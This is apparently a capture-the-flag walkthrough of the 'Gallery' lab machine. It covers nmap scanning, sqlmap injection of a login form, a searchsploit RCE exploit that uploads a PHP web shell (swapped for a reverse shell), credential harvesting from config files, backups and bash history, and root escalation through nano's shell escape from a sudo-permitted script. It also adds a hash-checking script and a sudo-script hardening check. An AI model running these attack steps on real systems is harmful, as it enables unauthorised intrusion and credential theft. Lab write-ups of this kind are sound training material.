CTF : Gallery
Information
- IP: 10.10.174.242
- MYIP: 10.8.98.126
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p- -A 10.10.174.242
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-04 22:17 CET
Nmap scan report for 10.10.174.242
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Simple Image Gallery System
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   35.28 ms 10.8.0.1
2   35.42 ms 10.10.174.242

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.11 seconds
```
Only two ports are open, both HTTP: port 80 serves the Apache default page, port 8080 the application. Nmap also notes that the app's PHPSESSID cookie is set without the HttpOnly flag.

CMS => Simple Image Gallery System
Vulnerabilities search
The site on 8080 lands directly on a login page, so the first thing to try is SQL injection with sqlmap. I captured the login POST request in Burp, saved it to post.txt, then ran:

```console
$ sqlmap -r post.txt --level=5 --risk=3 --dump
```

Among the dumped rows:

```console
admin:a228b12a08b6527e7978cbe5d914531c
```

So the login form is injectable and I managed to retrieve the admin password hash (32 hex characters, the length of an MD5 digest), but I failed to crack it.
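A cheap check worth repeating every time the box leaks another password: run the dumped hash through a wordlist with nothing but coreutils. This is an added example, not part of the original writeup; the wordlist is constructed here from the credentials this walkthrough turns up later on the host (the DB password and the accounts.txt entries) plus two defaults, and no claim is made that any of them is the admin password: the function prints the first hit, or nothing.

```shell
#!/bin/sh
# Added example, not from the original writeup: test an unsalted MD5 hash
# against a wordlist using only coreutils (md5sum, cut, tr).  The wordlist
# below is constructed from secrets found elsewhere on this box plus two
# defaults; whether any of them matches the admin hash is not claimed.

# md5_crack HASH WORDLIST: print the word whose MD5 equals HASH and exit 0,
# or print nothing and exit 1 when no word in WORDLIST matches
md5_crack() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ -z "$word" ]; then continue; fi
        h=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed wordlist: credentials seen on the box, plus two defaults
WORDLIST=$(mktemp)
cat > "$WORDLIST" <<'EOF'
passw0rd321
mycat666
123456789pass
darkhacker123
admin
password
EOF

# Usage: the admin hash sqlmap dumped from gallery_db
md5_crack a228b12a08b6527e7978cbe5d914531c "$WORDLIST" || echo "admin hash: no match in wordlist"
```

This only makes sense for unsalted single-round hashes like the one the gallery stores; for anything salted or iterated (bcrypt, PBKDF2) hand the hash to hashcat or john instead of a shell loop.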
Well, is there another exploit ?
```console
$ searchsploit simple image gallery
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Sit | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)             | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection                                 | php/webapps/50198.txt
------------------------------------------------------------------------------------- ---------------------------------
```

Yes! I'll try the unauthenticated RCE:

```console
$ searchsploit -m php/webapps/50214.py
```
Exploit
The script bypasses the login (the same injection sqlmap found) and uploads a PHP web shell. I modified it to upload a PHP reverse shell instead, with a listener waiting on my side.

```console
$ python3 50214.py
TARGET = 10.10.174.242:8080
Login Bypass
shell name TagomzapqroqzemplsqLetta
protecting user
User ID : 1
Firsname : Adminstrator
Lasname : Admin
Username : admin
shell uploading - OK -
Shell URL : http://10.10.174.242/gallery/uploads/1646430120_TagomzapqroqzemplsqLetta.php?cmd=whoami
```

The uploaded file sits in /gallery/uploads/ with a predictable name (timestamp plus the chosen shell name). Requesting it runs the reverse shell:

```console
$ curl http://10.10.174.242/gallery/uploads/1646430120_TagomzapqroqzemplsqLetta.php
```

We got a shell \o/
Privilege escalation
Enumeration for privesc
There are two users with a login shell, ubuntu and mike:

```console
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
mike:x:1001:1001:mike:/home/mike:/bin/bash
```
In /var/www/html/gallery:

```console
$ cat initialize.php
<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
```

Two things here: the MySQL credentials (gallery_user / passw0rd321) are hardcoded in the web root, and the application ships a built-in developer account, dev_oretnom, with its own hardcoded password hash. Neither is much use right now, though: passw0rd321 is not mike's password :(
I found another interesting file, but I think it's not for now ;)

```console
$ cat /opt/rootkit.sh
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
    versioncheck) /usr/bin/rkhunter --versioncheck ;;
    update) /usr/bin/rkhunter --update;;
    list) /usr/bin/rkhunter --list;;
    read) /bin/nano /root/report.txt;;
    *) exit;;
esac
```
Hmm! In /var/backups:

```console
drwxr-xr-x 5 root root 4096 May 24  2021 mike_home_backup
```
And then :
```console
$ cat /var/backups/mike_home_backup/documents/accounts.txt
Spotify : mike@gmail.com:mycat666
Netflix : mike@gmail.com:123456789pass
TryHackme: mike:darkhacker123
```

But again none of these passwords works :(

Then I looked at /var/backups/mike_home_backup/.bash_history, and there was a sudo command line that included the valid password :) (a password typed on the command line ends up in the shell history, and here the whole home directory had been backed up world-readable).

OK, I can su to mike's account.
Don't forget to retrieve the user flag ;)

```console
$ cat /home/mike/user.txt
```
And mike can use sudo:

```console
$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
```

This is the shell script we found earlier, and mike can run it as root without a password. The fourth choice, read, is the interesting one: it opens /root/report.txt in nano, and that nano process runs as root. nano has an "Execute Command" function (Ctrl+R to read a file, then Ctrl+X to run a command instead), so anything typed there runs as root. The sudoers rule pins the command line to /bin/bash /opt/rootkit.sh, but the script itself hands out an interactive editor with a shell escape, which is as good as a root shell :)
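The lesson for whoever wrote that sudoers rule: before allowing a wrapper script as root, grep it for interactive programs that can spawn a shell from inside. The block below is an added example, not part of the original writeup or of the box: a small static triage over a copy of rootkit.sh reconstructed from this page, beside the hardened variant the read branch should have used (cat has no command-execution feature). The temporary file names and the ESCAPE_BINS list are my own choices; the list is a subset of the GTFOBins shell-escape entries, not an exhaustive one.

```shell
#!/bin/sh
# Added example, not part of the original writeup or of the box: flag any call
# to an interactive program with a known shell escape (nano's Ctrl+R Ctrl+X,
# vim's :!, less's !, ...) in a script that sudoers allows as root, and show
# the hardened dispatcher.  The rootkit.sh copy is reconstructed from the
# writeup so the check has something to run on.

# Interactive binaries with a shell escape (a subset of the GTFOBins list)
ESCAPE_BINS='nano pico vim vi less more man ed'

# has_shell_escape FILE: print every line that invokes one of ESCAPE_BINS,
# by bare name or full path such as /bin/nano; exit 0 if any, 1 if none
has_shell_escape() {
    rc=1
    for bin in $ESCAPE_BINS; do
        if grep -nE "(^|[[:space:]/])$bin([[:space:]]|$)" "$1"; then
            rc=0
        fi
    done
    return $rc
}

# The script as found on the box (reconstructed from the writeup)
ORIG=$(mktemp)
cat > "$ORIG" <<'EOF'
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
case $ans in
  versioncheck) /usr/bin/rkhunter --versioncheck ;;
  update) /usr/bin/rkhunter --update;;
  list) /usr/bin/rkhunter --list;;
  read) /bin/nano /root/report.txt;;
  *) exit;;
esac
EOF

# Hardened variant: the report is shown read-only with cat, which cannot run
# commands, and an unknown answer fails instead of silently exiting 0
HARDENED=$(mktemp)
cat > "$HARDENED" <<'EOF'
#!/bin/bash
read -r -p "Would you like to versioncheck, update, list or read the report ? " ans
case "$ans" in
  versioncheck) /usr/bin/rkhunter --versioncheck ;;
  update)       /usr/bin/rkhunter --update ;;
  list)         /usr/bin/rkhunter --list ;;
  read)         /bin/cat /root/report.txt ;;
  *)            echo "unknown choice" >&2; exit 1 ;;
esac
EOF

# Usage: triage both scripts
for f in "$ORIG" "$HARDENED"; do
    if has_shell_escape "$f"; then
        echo "$f: UNSAFE to allow via sudo (shell-escape binary above)"
    else
        echo "$f: no shell-escape binaries found"
    fi
done
```

This is a triage, not a proof: a script can reach an editor indirectly (an EDITOR variable, a program that opens one for you), so the real fix is the design rule the hardened copy follows, never launch an interactive editor or pager from anything sudo runs as root.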
Exploit
Let's go:

```console
$ sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
```

Once nano is open, press Ctrl+R then Ctrl+X, and at the command prompt type `reset; sh 1>&0 2>&0`. nano runs that command as root, and the redirections attach the shell's output and errors to the terminal, so a root shell opens:

```console
# cat /root/root.txt
```
\o/